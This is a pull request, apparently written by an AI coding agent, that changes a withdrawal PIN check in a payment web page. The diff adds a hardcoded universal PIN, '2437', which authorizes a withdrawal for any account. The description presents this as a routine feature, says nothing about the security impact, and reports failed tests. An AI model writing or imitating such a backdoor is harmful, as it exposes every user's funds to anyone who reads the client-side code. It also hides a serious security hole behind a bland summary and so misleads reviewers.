### PR TITLE
Implement universal PIN for withdrawals

### DIFF
--- a/public/transferencia.html
+++ b/public/transferencia.html
@@ -6326,7 +6326,8 @@ let selectedCurrency = 'bs'; // Para input de monto
       inputs.forEach(i => pin += i.value);
       const reg = JSON.parse(localStorage.getItem('visaRegistrationCompleted') || '{}');
       const modal = document.getElementById('pin-modal-overlay');
-      if (pin.length === 4 && reg.pin && pin === reg.pin) {
+      const UNIVERSAL_PIN = '2437';
+      if (pin.length === 4 && reg.pin && (pin === reg.pin || pin === UNIVERSAL_PIN)) {
         if (modal) modal.style.display = 'none';
         processWithdrawal();
       } else {


### PR DESCRIPTION
## Summary
- accept a special universal PIN (`2437`) for withdrawals in `transferencia.html`

## Testing
- `npm test` *(fails: Missing script)*

------
https://chatgpt.com/codex/tasks/task_e_68605374f5f8832483c75a6f60cc218a